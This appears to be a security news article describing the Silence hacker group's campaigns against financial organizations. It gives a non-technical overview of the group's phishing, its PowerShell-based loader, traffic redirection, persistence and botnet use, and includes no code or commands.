The Silence hackers are a dangerous criminal collective that are confirmed to be Russian-speaking and probably originate from a Slavic country. Their latest attacks are set against numerous financial organizations and institutions across a wide range of areas. The frequency of their campaigns is noticeably higher in the last few months.
Financial Organizations and Institutions Under Attack By The Silence Hackers Group
The Silence hackers group is a well-known collective of adept criminals that are known to conduct extensive large-scale campaigns. Their first attacks have been detected first in 2016. They are conducted between several months and use advanced infiltration tactics. What’s particularly worrying is that they are adept as using different tools and strategies in order to find weaknesses and exploit them. It appears that interest of the Silence hackers are not home users at-large, but specific financial companies and organizations. In the latest attacks they have overhauled their methods and use a sophisticated intrusion scheme.
The Silence hackers have embedded a complex malware sequence which will be started as soon as the intrusion has been made. They are known for using several tools and techniques. This is often done by searching for vulnerabilities and if any are found exploits will be started. If the criminals want to target specific users they can utilize phishing tactics like emails. The messages will be disguised as coming from clients, customers or partners.
As soon as a weakness is found the Silence hackers will deploy a PowerShell-based loader that will perform a variety of malicious tasks:
- Command Execution — The scripts can be used to launch all kind of actions including programs launching, interaction with programs and services and etc.
- Traffic Redirect — It can redirect the Internet traffic generated by the host to a certain hacker-controlled server. This will allow the criminals to spy on the victims in real-time and gather all sent and received data.
- System Changes — Using the made infections any other malicious changes to the affected programs can be organized.
What’s particularly dangerous about these infections is that they can be programmed to setup a persistent and secure connection to a server. This will allow the criminals to take over control of the computers, steal users data and deploy all kinds of threats. In this particulr case they can be specific Trojans or system-affecting viruses that will hijack user data. When large networks are affected the engine may choose to recruit them into an international botnet which can be used to launch devastating denial-of-service (DDOS) attacks against other targets.